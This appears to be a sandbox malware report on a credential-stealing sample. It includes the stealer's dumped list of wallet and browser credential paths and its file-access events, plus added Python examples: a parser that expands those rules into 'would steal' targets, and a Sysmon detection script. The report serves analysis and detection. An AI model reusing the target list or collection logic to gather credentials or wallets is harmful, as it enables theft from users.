                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: \\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: \\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
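The wallet string dumped from RegAsm.exe above is a flat, pipe-delimited rule list: every five fields describe one grab target (display name, base-directory code, directory relative to that base, file mask, trailing 0/1 flag), and the file-open events that follow it are exactly those rules expanded against the sandbox user's profile. The parser below is an added example written for this report, not the stealer's own code. It expands an excerpt of the dumped string into the directories the stealer enumerates and matches a constructed file inventory against them, so an analyst holding a similar string from a memory dump can list what would have been taken. The base-code mapping (0 = AppData\Local, 1 = AppData\Roaming, 2 = the profile root) is inferred from the file-open events (Coinomi under Local with code 0, Bitcoin under Roaming with code 1, .chia with code 2), and reading the trailing flag as "descend into subdirectories" is an assumption; the username `user` and the sample file list are constructed to match the sandbox paths.

```python
"""Expand Vidar's pipe-delimited wallet rules into concrete grab targets.

Added example for this report, not the stealer's own code. Every five fields
of the dumped string describe one target:
    <display name>|<base dir code>|<relative dir>|<file mask>|<flag>|
"""
import fnmatch
from dataclasses import dataclass

# Excerpt of the rule string dumped from RegAsm.exe memory (five of the rules).
SAMPLE_RULES = (
    "Bitcoin Core|1|\\Bitcoin\\wallets\\|wallet.dat|1|"
    "Bitcoin Core Old|1|\\Bitcoin\\|*wallet*.dat|0|"
    "Exodus|1|\\Exodus\\exodus.wallet\\|seed.seco|0|"
    "Coinomi|0|\\Coinomi\\Coinomi\\wallets\\|*.wallet|0|"
    "Chia Wallet|2|\\.chia\\mainnet\\wallet\\|*.sqlite|0|"
)

# ASSUMPTION: base-directory codes, inferred from the report's file-open events
# (code 1 -> AppData\Roaming\Bitcoin\wallets\, code 0 -> AppData\Local\Coinomi\...,
# code 2 -> \.chia\ which lives directly under the profile). Username as in the sandbox.
BASE_DIRS = {
    "0": r"C:\Users\user\AppData\Local",
    "1": r"C:\Users\user\AppData\Roaming",
    "2": r"C:\Users\user",
}


@dataclass(frozen=True)
class WalletRule:
    name: str
    base_code: str
    rel_dir: str      # starts and ends with a backslash in the dumped string
    mask: str         # glob, e.g. *wallet*.dat
    recursive: bool   # ASSUMPTION: trailing 0/1 read as "descend into subdirectories"


def parse_rules(blob: str) -> list[WalletRule]:
    """Split the flat string into WalletRule records; reject a truncated dump."""
    fields = blob.split("|")
    if fields and fields[-1] == "":      # the string ends with a separator
        fields.pop()
    if len(fields) % 5:
        raise ValueError(f"rule string is not a multiple of 5 fields ({len(fields)} fields)")
    return [
        WalletRule(name, code, rel_dir, mask, flag == "1")
        for name, code, rel_dir, mask, flag in (fields[i:i + 5] for i in range(0, len(fields), 5))
    ]


def target_dir(rule: WalletRule, base_dirs: dict[str, str] = BASE_DIRS) -> str:
    """Absolute directory the stealer enumerates for this rule."""
    try:
        return base_dirs[rule.base_code] + rule.rel_dir
    except KeyError:
        raise KeyError(f"unknown base code {rule.base_code!r} in rule {rule.name!r}") from None


def matches(rules: list[WalletRule], files: list[str]) -> list[tuple[str, str]]:
    """Return (rule name, path) for every path a rule would collect.

    `files` are absolute Windows paths supplied by the caller, so this runs
    offline against a constructed inventory instead of walking a live disk.
    """
    hits = []
    for rule in rules:
        directory = target_dir(rule).lower()
        for path in files:
            lowered = path.lower()
            if not lowered.startswith(directory):
                continue
            rest = lowered[len(directory):]
            if "\\" in rest and not rule.recursive:   # file sits in a subdirectory
                continue
            if fnmatch.fnmatchcase(rest.rsplit("\\", 1)[-1], rule.mask.lower()):
                hits.append((rule.name, path))
    return hits


# Constructed inventory of a victim profile (not from the report).
SAMPLE_FILES = [
    r"C:\Users\user\AppData\Roaming\Bitcoin\wallets\wallet.dat",
    r"C:\Users\user\AppData\Roaming\Bitcoin\old_wallet.dat",
    r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco",
    r"C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\main.wallet",
    r"C:\Users\user\.chia\mainnet\wallet\blockchain_wallet_v2_mainnet.sqlite",
    r"C:\Users\user\Documents\notes.txt",
]

if __name__ == "__main__":
    for rule in parse_rules(SAMPLE_RULES):
        print(f"{rule.name:18} {target_dir(rule)}{rule.mask}  recursive={rule.recursive}")
    for name, path in matches(parse_rules(SAMPLE_RULES), SAMPLE_FILES):
        print(f"would steal [{name}] {path}")
```

Run as-is it prints the expanded targets and the five constructed files the excerpt would collect; `notes.txt` is ignored and `wallet.dat` under `\Bitcoin\wallets\` is claimed by the "Bitcoin Core" rule only, because the non-recursive "Bitcoin Core Old" rule does not descend into the `wallets` subdirectory. Feeding the full string from the dump instead of the excerpt yields the complete artefact list to check on a host suspected of running this sample.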

                  Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_6C9A0C40 sqlite3_bind_zeroblob,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_6C9A0D60 sqlite3_bind_parameter_name,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_6C8C8EA0 sqlite3_clear_bindings,
MITRE ATT&CK Matrix (cells listed per tactic column, top to bottom; a number in front of a technique is the figure shown on that matrix cell, techniques without a number are unmarked cells of the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 511 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 1 Virtualization/Sandbox Evasion; 511 Process Injection; Compile After Delivery; Indicator Removal from Tools; HTML Smuggling
Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 4 File and Directory Discovery; 55 System Information Discovery; 1 Network Share Discovery; 141 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 4 Data from Local System; 1 Screen Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1443407, sample: file.exe, start date: 17/05/2024, architecture: WINDOWS, score: 100)

Sample level: domain steamcommunity.com; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures.

Process tree:
  file.exe (graph counter: 1)
    signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    -> RegAsm.exe (graph counters: 1, 46)
         network: steamcommunity.com 104.102.42.29 port 443 from local port 49704 (AKAMAI-ASUS, United States); 95.217.240.101 port 443 from local ports 49705 and 49706 (HETZNER-ASDE, Germany)
         dropped: C:\Users\user\AppData\...\vcruntime140[1].dll (PE32); C:\Users\user\AppData\...\softokn3[1].dll (PE32); C:\Users\user\AppData\Local\...\nss3[1].dll (PE32); 10 other files (none is malicious)
         signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 6 other signatures
         -> cmd.exe (graph counter: 1)
              -> conhost.exe
              -> timeout.exe (graph counter: 1)
    -> conhost.exe
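The graph reduces to four host-observable behaviours: RegAsm.exe started by something other than developer or installer tooling, RegAsm.exe speaking TLS to a bare IP address (95.217.240.101) while the only named host is steamcommunity.com, RegAsm.exe loading Mozilla NSS and sqlite helper DLLs from a writable directory under C:\ProgramData\ rather than a Firefox install, and a cmd.exe -> timeout.exe chain beneath it. The detection below is an added example, not part of the Joe Sandbox report: it encodes those four rules over Sysmon-style process-create (EventID 1), network-connect (EventID 3) and image-load (EventID 7) records. The records are constructed; the PIDs 6352 and 1600 and the dropped-DLL path come from the report, while the file.exe location, the other PIDs, the cmd.exe command line and the set of parents treated as legitimate for RegAsm.exe are assumptions.

```python
"""Detection logic for the RegAsm.exe process chain in the behaviour graph.

Added example, not part of the Joe Sandbox report. Event records are
constructed Sysmon-style dicts; PIDs 6352/1600 and the nss3.dll drop path are
taken from the report, the rest is made up for the demonstration.
"""
import ntpath

REGASM = "regasm.exe"
# ASSUMPTION: parents that legitimately spawn RegAsm.exe (build/installer tooling).
TRUSTED_REGASM_PARENTS = {"msbuild.exe", "devenv.exe", "msiexec.exe", "setup.exe"}
# NSS / sqlite helper DLLs the stealer stages (names from the dropped-file list).
STAGED_DLLS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll", "sqlx.dll"}
# Where those DLLs are legitimately loaded from (Firefox/Thunderbird installs).
TRUSTED_DLL_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events: list[dict]) -> list[tuple[str, str]]:
    """Return (rule_id, detail) for every RegAsm.exe event matching one of four rules."""
    children: dict[int, list[dict]] = {}
    for e in events:
        if e["EventID"] == 1:
            children.setdefault(e["ParentProcessId"], []).append(e)

    alerts = []
    for e in events:
        if basename(e["Image"]) != REGASM:
            continue
        eid = e["EventID"]
        if eid == 1:
            # Rule 1: RegAsm.exe launched by an untrusted parent (file.exe here).
            if basename(e["ParentImage"]) not in TRUSTED_REGASM_PARENTS:
                alerts.append(("regasm_untrusted_parent", e["ParentImage"]))
            # Rule 2: RegAsm.exe -> cmd.exe -> timeout.exe, the chain the graph shows.
            for cmd in children.get(e["ProcessId"], []):
                grandchildren = children.get(cmd["ProcessId"], [])
                if basename(cmd["Image"]) == "cmd.exe" and any(
                        basename(g["Image"]) == "timeout.exe" for g in grandchildren):
                    alerts.append(("regasm_cmd_timeout_chain", cmd["CommandLine"]))
        elif eid == 3:
            # Rule 3: TLS to a literal IP with no hostname resolved for it.
            if e["DestinationPort"] == 443 and not e.get("DestinationHostname"):
                alerts.append(("regasm_tls_to_bare_ip", e["DestinationIp"]))
        elif eid == 7:
            # Rule 4: NSS/sqlite helper DLL loaded from outside a browser install dir.
            loaded = e["ImageLoaded"]
            if basename(loaded) in STAGED_DLLS and not loaded.lower().startswith(TRUSTED_DLL_PREFIXES):
                alerts.append(("regasm_loads_staged_nss", loaded))
    return alerts


RA = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed event stream mirroring the graph (file.exe location is assumed).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 6352, "ParentProcessId": 4000,
     "Image": r"C:\Users\user\Desktop\file.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Users\user\Desktop\file.exe"},
    {"EventID": 1, "ProcessId": 1600, "ParentProcessId": 6352,
     "Image": RA, "ParentImage": r"C:\Users\user\Desktop\file.exe", "CommandLine": RA},
    {"EventID": 3, "ProcessId": 1600, "Image": RA,
     "DestinationIp": "95.217.240.101", "DestinationPort": 443, "DestinationHostname": ""},
    {"EventID": 3, "ProcessId": 1600, "Image": RA,
     "DestinationIp": "104.102.42.29", "DestinationPort": 443, "DestinationHostname": "steamcommunity.com"},
    {"EventID": 7, "ProcessId": 1600, "Image": RA,
     "ImageLoaded": r"C:\ProgramData\FCGCGDHJEGHJ\nss3.dll"},
    {"EventID": 1, "ProcessId": 7100, "ParentProcessId": 1600,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": RA,
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c timeout /t 10'},   # assumed command line
    {"EventID": 1, "ProcessId": 7120, "ParentProcessId": 7100,
     "Image": r"C:\Windows\System32\timeout.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "timeout /t 10"},
    # benign control: Firefox loading its own copy of nss3.dll must not fire
    {"EventID": 7, "ProcessId": 5000, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ImageLoaded": r"C:\Program Files\Mozilla Firefox\nss3.dll"},
]

if __name__ == "__main__":
    for rule_id, detail in detect(SAMPLE_EVENTS):
        print(f"{rule_id:26} {detail}")
```

On the constructed stream this yields exactly four alerts, one per rule, and nothing for the Firefox control or for the steamcommunity.com connection. Note that the staged DLLs themselves scan clean (0% at ReversingLabs in the dropped-file table below), so a hash-based rule would miss them; the signal is which process loads nss3.dll and from which directory.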

Source | Detection | Scanner | Label
file.exe | 100% | Avira | HEUR/AGEN.1352999
file.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner
C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll | 0% | ReversingLabs
C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll | 0% | ReversingLabs
C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll | 0% | ReversingLabs
C:\ProgramData\FCGCGDHJEGHJ\nss3.dll | 0% | ReversingLabs
C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll | 0% | ReversingLabs
C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll | 0% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl | 0% | URL Reputation | safe
http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | URL Reputation | safe
http://www.mozilla.com/en-US/blocklist/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english | 0% | URL Reputation | safe
https://mozilla.org0/ | 0% | URL Reputation | safe
http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe
https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | URL Reputation | safe
https://store.steampowered.com/about/ | 0% | URL Reputation | safe
https://help.steampowered.com/en/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english | 0% | Avira URL Cloud | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | Avira URL Cloud | safe
https://95.217.240.101IDH | 0% | Avira URL Cloud | safe
